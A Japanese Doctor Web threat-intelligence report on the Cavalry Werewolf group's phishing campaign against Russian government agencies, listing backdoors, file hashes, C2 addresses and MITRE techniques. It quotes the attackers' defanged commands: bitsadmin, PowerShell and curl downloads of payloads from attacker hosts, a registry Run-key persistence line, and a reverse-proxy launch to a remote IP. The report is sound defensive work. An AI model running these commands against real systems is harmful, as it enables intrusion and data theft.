ハッカー集団「Cavalry Werewolf」がロシア政府機関を攻撃
ウイルスアラート | Hot news | 全てのニュース
2025年11月11日
序論
この調査において、Doctor Webのエキスパートはオープンソースツールを含むこれまでに知られていなかったマルウェアを特定することに成功しました。それらの一部として、攻撃対象システム上でのリモートコマンド実行を可能にし、偵察とそれに続くネットワークインフラストラクチャ内での足場固めのための環境を整える複数のバックドアが確認されています。
本稿では、発見されたCavalry Werewolfのツールや同ハッカー集団の特徴、そしてこれらのサイバー犯罪者たちが侵害されたネットワーク内で実行する典型的なアクションについて解説します。
攻撃および使用されたツールに関する全般的情報
1台目のコンピューターに対する初期アクセス(最初のアクセス)には一般的な攻撃ベクトルが用いられています。すなわち、文書に偽装したマルウェアの添付されたフィッシングメールです。今回の事例では、攻撃時点で未知のバックドアであったBackDoor.ShellNET.1がメッセージに含まれていました。これはオープンソースソフトウェアReverse-Shell-CSをベースにしたバックドアで、感染したシステムにリバースシェル経由でリモート接続してさまざまなコマンドを実行することを可能にします。このバックドアはパスワード保護されたアーカイブ内に仕込まれており、フィッシングキャンペーンごとに異なる名前が付いています。
| BackDoor.ShellNET.1に付けられたファイル名のバリエーション |
|---|
| Службеная записка от 16.06.2025___________________________.exe |
| О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe |
| О проведении личного приема граждан список участников.exe |
| О работе почтового сервера план и проведенная работа.exe |
BackDoor.ShellNET.1の添付されたフィッシングメールの例:攻撃者は「文書」を読むよう受信者に促し、アーカイブを解凍するためのパスワードを提供している
攻撃者は BackDoor.ShellNET.1 を使用して標的システム内での足がかりの構築を進めました。ファイル転送タスクを管理するためのWindows標準ツールBitsadmin(C:\Windows\SysWOW64\bitsadmin.exe)を介して複数の悪意のあるプログラムがダウンロードされています。このプログラムは特定のコマンドラインスイッチを使用して現在のシステム管理者として起動されていました。以下はその例です
cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe
C:\users\public\downloads\winpot.exeBackDoor.ShellNET.1 によって最初にダウンロードされた脅威はスティーラーTrojan.FileSpyNET.5でした。このトロイの木馬を使用して、攻撃者はコンピューター上に保存されている .doc、.docx、.xlsx、.pdf 形式の文書、テキストファイル(.txt)、画像ファイル (.jpg、.png)をダウンロードしています。
次に、バックドアBackDoor.Tunnel.41(オープンソースソフトウェアReverseSocks5)がインストールされました。攻撃者はこのバックドアを使用することでSOCKS5トンネルを作成して密かにコンピューターに接続し、そこでコマンドを実行(別のマルウェアをインストールするなど)しています。
Cavalry Werewolfのツール
今回のインシデントに関する調査の結果、Cavalry Werewolfによる標的型攻撃では上記のマルウェアのみでなく他のツールも多数使用されていることが明らかになりました。Cavalry Werewolfのマルウェア作成者は武器として用いるマルウェアの組み合わせを1つにとどめることなく、その数を常に増やし続けているという点に注意する必要があります。そのため、標的システムへの侵入に使用されるツールや感染チェーンにおけるその先の段階は、攻撃対象となる組織によって異なる場合があります。
エントリーポイント(侵入口)
感染チェーンの第一段階となるのはCavalry Werewolfから送信されるフィッシングメールに仕込まれたマルウェアです。ただし、それらマルウェアの種類は1つだけではありません。Doctor Webのウイルスアナリストによって以下が特定されています。
- スクリプト(BAT.DownLoader.1138)
- 実行ファイル(Trojan.Packed2.49708、 Trojan.Siggen31.54011、 BackDoor.Siggen2.5463、 BackDoor.RShell.169、 BackDoor.ReverseShell.10)
BAT.DownLoader.1138
PowerShellバックドアPowerShell.BackDoor.109を標的システムにダウンロードするバッチファイルです。このバックドアはコンピューター上に別のマルウェアをダウンロードして起動する目的で攻撃者によって使用されます。
| BAT.DownLoader.1138の既知のファイル名 | SHA1ハッシュ | С2サーバー |
|---|---|---|
| scan26_08_2025.bat | d2106c8dfd0c681c27483a21cc72d746b2e5c18c | 168[.]100.10[.]73 |
Trojan.Packed2.49708
本体内に暗号化された形で格納されているバックドアBackDoor.Spy.4033をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。
| Trojan.Packed2.49708の既知のファイル名 | SHA1ハッシュ | С2サーバー |
|---|---|---|
|
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe |
5684972ded765b0b08b290c85c8fac8ed3fea273 | 185[.]173.37[.]67 |
| Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe | 29ee3910d05e248cfb3ff62bd2e85e9c76db44a5 | 185[.]231.155[.]111 |
|
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe |
ce4912e5cd46fae58916c9ed49459c9232955302 | 109[.]172.85[.]95 |
| C:\Windows\746wljxfs.exe | 653ffc8c3ec85c6210a416b92d828a28b2353c17 | 185[.]173.37[.]67 |
| — | b52e1c9484ab694720dc62d501deca2aa922a078 | 109[.]172.85[.]95 |
Trojan.Siggen31.54011
本体内に暗号化された形で格納されているバックドアBackDoor.Spy.4038をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。
Trojan.Siggen31.54011の機能はTrojan.Packed2.49708と似ていますが、ペイロードの抽出アルゴリズムがわずかに異っています。
| SHA1ハッシュ | С2サーバー |
|---|---|
| baab225a50502a156222fcc234a87c09bc2b1647 | 109[.]172.85[.]63 |
| 93000d43d5c54b07b52efbdad3012e232bdb49cc | 109[.]172.85[.]63 |
BackDoor.Siggen2.5463
Telegramボットを介して操作され、攻撃者から受け取ったタスクを実行するバックドアです。このマルウェアのメイン機能は本体内に隠されたPowerShellコードにあります。
| BackDoor.Siggen2.5463の既知のファイル名 | SHA1ハッシュ | ペイロード |
|---|---|---|
|
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe |
c96beb026dc871256e86eca01e1f5ba2247a0df6 | PowerShell.BackDoor.108 |
BackDoor.RShell.169
攻撃者がリバースシェル経由で感染したコンピューターにリモート接続し、さまざまなコマンドを実行できるようにするバックドアです。
| BackDoor.RShell.169の既知のファイル名 | SHA1ハッシュ | С2サーバー |
|---|---|---|
|
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe |
633885f16ef1e848a2e057169ab45d363f3f8c57 | 109[.]172.85[.]63 |
BackDoor.ReverseShell.10
リバースシェルを有効にし、攻撃者にシステムへのリモートアクセスを提供するバックドアです。
| BackDoor.ReverseShell.10の既知のファイル名 | SHA1ハッシュ | С2サーバー |
|---|---|---|
|
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe |
dd98dcf6807a7281e102307d61c71b7954b93032 | 195[.]2.78[.]133 |
|
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe |
f546861adc7c8ca88e3b302d274e6fffb63de9b0 | 62[.]113.114[.]209 |
次の感染段階
デバイスが侵害された後、その感染したデバイス上には以下のマルウェアがインストールされる可能性があります。
Trojan.Inject5.57968
本体内に暗号化されたバックドアを持つトロイの木馬です。そのバックドアは、攻撃者が感染したコンピューターに悪意のあるプログラムをダウンロードすることを可能にします。ペイロードの復号化は複数の段階で実行され、そのうちの1つで、Microsoft .NET Frameworkパッケージの一部であるaspnet_compiler.exeプログラムのプロセスに悪意のあるデータ配列が挿入されます。その後、完全に復号化されたバックドアがこの正規アプリのプロセスコンテキスト内で動作します。
インタラクティブな脅威アナライザーDr.Web vxCube の「サンドボックス」を使用した、Trojan.Inject5.57968のアクティビティ調査
| Trojan.Inject5.57968の既知のファイル名 | SHA1ハッシュ | С2サーバー | ペイロード |
|---|---|---|---|
| pickmum1.exe | e840c521ec436915da71eb9b0cfd56990f4e53e5 | 64[.]95.11[.]202 | Trojan.PackedNET.3351 |
| mummyfile1.exe | 22641dea0dbe58e71f93615c208610f79d661228 | 64[.]95.11[.]202 | Trojan.PackedNET.3351 |
BackDoor.ShellNET.2
Telegramボットを介して操作され、攻撃者から受け取ったコマンドを実行するバックドアです。
| BackDoor.ShellNET.2の既知のファイル名 | SHA1ハッシュ |
|---|---|
| win.exe | 1957fb36537df5d1a29fb7383bc7cde00cd88c77 |
BackDoor.ReverseProxy.1
オープンソースソフトウェアReverseSocks5をベースにしたバックドアで、感染したシステム上でSOCKS5プロキシを有効にしてリモートアクセスを可能にします。BackDoor.ReverseProxy.1は -connect IPパラメータを指定してコマンドインタープリタcmd.exeから起動されることにより、目的のアドレスに接続します。アドレスがハードコードされている亜種も存在します。
以下のIPアドレスが検出されています。
- 78[.]128.112[.]209 (起動コマンドで指定)
- 96[.]9.125[.]168 (起動コマンドで指定)
- 188[.]127.231[.]136 (ハードコード)
| BackDoor.ReverseProxy.1の既知のファイル名 | SHA1ハッシュ |
|---|---|
| revv2.exe | 6ec8a10a71518563e012f4d24499b12586128c55 |
Trojan.Packed2.49862
攻撃者によって悪意のあるコードが埋め込まれた、正規プログラムのトロイの木馬化されたバージョンの検出名です。アーカイバWinRarおよび7-Zip、開発ツールVisual Studio Code、テキストエディタAkelPadをはじめとする複数のアプリの悪意のある改変版が発見されています。メッセンジャーMAXに偽装したSumatra PDF Readerもそのうちの1つです。改変版は本来の機能を実行することはできず、起動されると埋め込まれたトロイの木馬コンポーネントを初期化するだけです。
これらの改変版には、サイバー犯罪者の目的に応じてあらゆる種類のマルウェアが仕込まれています。以下はその一部です。
- BackDoor.ReverseProxy.1 (ReverseSocks5)
- BackDoor.Shell.275 (AdaptixC2)
- BackDoor.AdaptixC2.11 (AdaptixC2)
- BackDoor.Havoc.16 (Havoc)
- BackDoor.Meterpreter.227 (CobaltStrike)
- Trojan.Siggen9.56514 (AsyncRAT)
- Trojan.Clipper.808
| Trojan.Packed2.49862の既知のファイル名 | SHA1ハッシュ | С2サーバー | ペイロード |
|---|---|---|---|
|
code.exe rev2.exe |
8279ad4a8ad20bf7bbca0fc54428d6cdc136b776 | 188[.]127.231[.]136 | BackDoor.ReverseProxy.1 |
|
code.exe revv.exe |
a2326011368d994e99509388cb3dc132d7c2053f | 192[.]168.11[.]10 | BackDoor.ReverseProxy.1 |
|
7zr.exe winload.exe system.exe Recorded_TV.exe |
451cfa10538bc572d9fd3d09758eb945ac1b9437 | 77[.]232.42[.]107 | BackDoor.Shell.275 |
|
Command line RAR winlock.exe Recorded_TV.exe |
a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2 | 77[.]232.42[.]107 | BackDoor.AdaptixC2.11 |
|
winsrv.exe firefox.exe |
bbe3a5ef79e996d9411c8320b879c5e31369921e | 94[.]198.52[.]210 | BackDoor.AdaptixC2.11 |
| AkelPad.exe | e8ab26b3141fbb410522b2cbabdc7e00a9a55251 | 78[.]128.112[.]209 | BackDoor.Havoc.16 |
| 7z.exe | dcd374105a5542ef5100f6034c805878153b1205 | 192[.]168.88[.]104 | BackDoor.Meterpreter.227 |
| 7z.exe | e51a65f50b8bb3abf1b7f2f9217a24acfb3de618 | 192[.]168.1[.]157 | Trojan.Siggen9.56514 |
|
7z.exe chromedriver.exe |
d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4 | Telegram-бот | Trojan.Clipper.808 |
|
7z 7z.exe svc_host.exe dzveo09ww.exe |
c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81 | Telegram-бот | Trojan.Clipper.808 |
| — | b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5 | Telegram-бот | Trojan.Clipper.808 |
| max - для бизнеса.exe | b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231 | 89[.]22.161[.]133 | BackDoor.Havoc.16 |
侵害されたネットワーク内でCavalry Werewolfが実行する典型的なアクション
標的となる組織のコンピューターインフラストラクチャに侵入した攻撃者は、データ収集やシステム内でのさらなる足場固めを目的としたさまざまなアクションを実行します。
感染させたコンピューターに関する情報を収集するために、以下のコマンドを実行します。
- whoami — カレントユーザーに関する情報を取得する
- dir C:\\users\\<user>\\Downloads — カレントユーザーの「ダウンロード」フォルダ内にあるファイルのリストを取得する
- dir C:\\users\\public\\pictures\\ — 共有フォルダの「ピクチャ」フォルダ内にあるファイルのリストを取得する(どのマルウェアがすでにシステム内にダウンロードされているかを特定するため)
- ipconfig /all — ネットワーク設定を取得する
- net user — システム内のすべてのユーザーのリストを取得する
プロキシサーバーに関する情報を収集し、ネットワークの機能をチェックするために、以下のコマンドを使用します。
- powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
- curl -I https://google.com
- curl -I https://google.com -x <proxy>
以下のツールを使用してネットワークを設定します。
- Windows OSに含まれているコマンドラインツールnetsh
続けて、以下の正規ツールを使用して悪意のあるツールをシステムに送り込みます。
- PowerShell (例: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe)
- Bitsadmin (例: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe)
- curl (例: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe)
システム内での足場を固めるために以下を実行します。
- Windowsレジストリを変更する(例:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\users\public\pictures\win.exe /f)
コマンドラインインタープリタcmd.exe を使用して悪意のあるツールを起動します。
例:
- C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — BackDoor.ReverseProxy.1;
- C:\\users\\public\\pictures\\732.exe — BackDoor.Tunnel.41.
攻撃者はPowerShellを使用して悪意のあるツールを削除できます。
例:
- powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe
また、pingコマンドを使用してC2サーバーが利用可能であるかどうか定期的にチェックすることもできます。
ハッカー集団Cavalry Werewolfの特徴
ハッカー集団Cavalry Werewolfの大きな特徴として以下が挙げられます。
- オープンソースソフトウェアを好んで使用する(オリジナルをそのまま使用する場合と、それをベースに独自のツールを開発する場合がある)。
- メインとなるツールは、感染したシステム上でのリモートコマンド実行を可能にするさまざまなリバースシェルバックドアである。
- 元々は無害なプログラムに悪意のあるコードを埋め込むことができる。
- 感染したコンピューターを制御するためにTelegram APIを使用することが多い。
- 侵害したメールアドレスを使用して政府機関を装ったメールを送信するというフィッシングキャンペーンによって、感染の第一段階を担うマルウェアを送り込む。
- その後の感染段階を担うマルウェアを標的デバイスにダウンロードするために、C:\\users\\public\\pictures、C:\\users\\public\\libraries、C:\\users\\public\\downloadsディレクトリを使用する。
このたび特定されたCavalry Werewolfのツールに関する詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。
BackDoor.ReverseProxy.1 の詳細 ※英語
BackDoor.ReverseShell.10 の詳細 ※英語
BackDoor.RShell.169 の詳細 ※英語
BackDoor.ShellNET.1 の詳細 ※英語
BackDoor.ShellNET.2 の詳細 ※英語
BackDoor.Siggen2.5463 の詳細 ※英語
BackDoor.Tunnel.41 の詳細 ※英語
BAT.DownLoader.1138 の詳細 ※英語
Trojan.Siggen31.54011 の詳細 ※英語
Trojan.Clipper.808 の詳細 ※英語
Trojan.FileSpyNET.5 の詳細 ※英語
Trojan.Inject5.57968 の詳細 ※英語
Trojan.Packed2.49708 の詳細 ※英語
Trojan.Packed2.49862 の詳細 ※英語
MITREマトリックス
| Stage(段階) | Technique(技術・手法) |
|---|---|
| Initial access(初期アクセス) | T1566.001:Spearphishing attachment(スピアフィッシング添付ファイル) |
| Execution(実行) |
T1204:User execution(ユーザーによる実行)
T1059.001:PowerShell T1059.003:Windows Command Shell |
| Persistence(永続化) |
T1547.001:Registry Run Keys / Startup Folder (レジストリRunキー/スタートアップフォルダ)
T1197:BITS Jobs (BITSジョブ) |
| Privilege Escalation(権限昇格) | T1548.002:Bypass User Account Control(ユーザーアカウント制御のバイパス) |
| Defense Evasion(防御回避) | T1197:BITS Jobs(BITSジョブ) |
| Command and Control(コマンド・アンド・コントロール) |
T1090.002:External Proxy(外部プロキシ)
T1102.002:Bidirectional Communication(双方向通信) |
| Exfiltration(情報窃取) |
T1041:Exfiltration Over C2 Channel(C2チャネルを介した盗み出し)
T1567:Exfiltration Over Web Service(Webサービスを介した盗み出し) |